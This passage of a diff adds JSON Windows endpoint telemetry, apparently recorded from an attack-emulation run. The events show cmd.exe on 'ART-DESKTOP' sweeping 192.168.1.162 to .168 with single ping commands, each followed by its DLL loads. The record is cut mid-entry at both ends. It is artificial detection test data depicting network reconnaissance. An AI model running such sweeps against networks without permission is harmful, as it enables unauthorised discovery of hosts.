131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "process", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572776990000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.162", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5596, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572777130000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "process", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572781830000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.163", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572781980000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "process", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572786840000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.164", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4724, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "process", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572791840000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.165", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4816, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "process", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.166", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572797029984, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "process", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572801990000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.167", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4664, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "process", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572806840000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.168", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7448, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": 